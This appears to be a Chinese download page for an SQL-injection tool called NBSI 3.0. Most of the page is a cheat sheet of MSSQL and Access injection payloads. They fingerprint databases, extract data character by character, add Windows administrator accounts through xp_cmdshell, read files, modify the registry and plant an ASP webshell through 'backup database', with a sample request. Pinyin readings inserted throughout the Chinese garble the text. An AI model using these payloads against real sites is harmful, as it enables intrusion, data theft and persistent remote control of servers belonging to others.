- 軟件大小:980KB
- 軟件語言:中文
- 軟(ruǎn)件類型:國產軟件
- 軟件類別:免費軟件 / 網絡安全
- 更新時間:2017-04-24 09:30
- 運行環境:WinAll, WinXP
- 軟件等級:
- 軟件廠商:
- 官方網站:暫無
頂好評:50%
踩(cǎi)壞評:50
網友評分:8 
36.34M/中文/5.0
5.00M/英文/10.0
1.78M/中文/10.0
276KB/中文(wén)/10.0
22.00M/英文/10.0
nbsi 3.0純淨版是一款專業的網站(zhàn)漏洞檢測工具,使用該軟件用戶可以快速的檢測(cè)網站漏洞,檢測結(jié)果精準(zhǔn),速度快,可以快速的提高該行業人員辦公效率,歡迎來綠色(sè)資源網下(xià)載!
本工具功能非常強(qiáng)大,希望同學們(men)用於正途,別去做一些偷(tōu)雞摸狗的令人可恥的事情,由VB語言(yán)編寫的網站漏洞檢測工具的名稱,ASP注入漏洞檢測工具(jù),特(tè)別在sql server注入檢(jiǎn)測方麵有極高的準確率(lǜ)。
1.判斷是否有注入
;and 1=1
;and 1=2
2.初(chū)步判斷是否是(shì)mssql
;and user>0
3.判斷數據庫係統
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4.注入參數是字符
'and [查詢條件] and ''='
5.搜索時沒過濾參數的
'and [查詢(xún)條(tiáo)件] and '%25'='
6.猜數據庫
;and (Select Count(*) from [數(shù)據(jù)庫名(míng)])>0
7.猜字段
;and (Select Count(字段名) from 數據庫(kù)名)>0
8.猜字段中記錄長度
;and (select top 1 len(字段名(míng)) from 數據庫名)>0
9.(1)猜字段的ascii值(zhí)(access)
;and (select top 1 asc(mid(字(zì)段名(míng),1,1)) from 數據庫(kù)名)>0
(2)猜字段的(de)ascii值(mssql)
;and (select top 1 unicode(substring(字段名(míng),1,1)) from 數據庫名)>0
10.測(cè)試權限結構(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('serveRadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(SELECT IS_MEMBER('db_owner'));--
11.添加mssql和係統(tǒng)的帳戶
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell 'net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add'
;--
;exec master.dbo.xp_cmdshell 'net user username
password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup
administrators username /add';--
12.(1)遍(biàn)曆目錄
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not
in('上步得到的(de)paths'))>)
(2)遍曆目錄
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 獲得當前所有驅動器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 獲得子目(mù)錄列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 獲得所有子目錄的目錄樹(shù)結構
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件(jiàn)的內容
13.mssql中的存儲過程(chéng)
xp_regenumvalues 注冊表根鍵(jiàn), 子鍵
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多個記(jì)錄集方(fāng)式返回所有鍵值
xp_regread 根鍵(jiàn),子鍵,鍵值名
;exec xp_regread 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion',
'CommonFilesDir' 返回製定鍵的(de)值
xp_regwrite 根鍵,子鍵, 值名, 值類型, 值(zhí)
值類型有2種(zhǒng)REG_SZ 表示字符型(xíng),REG_DWORD 表(biǎo)示整型(xíng)
;exec xp_regwrite 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion',
'TestValueName','reg_sz','hello' 寫(xiě)入注(zhù)冊表
xp_regdeletevalsue 根鍵,子鍵,值名
exec xp_regdeletevalsue 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion',
'TestValueName' 刪除某個值
xp_regdeletekey 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 刪除鍵,包(bāo)括該鍵下所有值
14.mssql的backup創建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<% Dim oScript %>');
backup database model to disk='c:\l.asp';
15.mssql內(nèi)置函數
;and (select @@version)>0 獲得Windows的版本號
;and user_name()='dbo' 判斷當前係統的連接用(yòng)戶是不是sa
;and (select user_name())>0 爆當前(qián)係統的連接用戶
;and (select db_name())>0 得到(dào)當前連接的數據庫
16.簡潔的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp';
請求的時候,像這樣(yàng)子用:
http://ip/l.asp?c=dir
解壓密碼:www.ynaad.com
請描述您所遇到的錯誤(wù),我們(men)將盡快予以修正,謝謝!
*必填(tián)項,請輸入(rù)內容
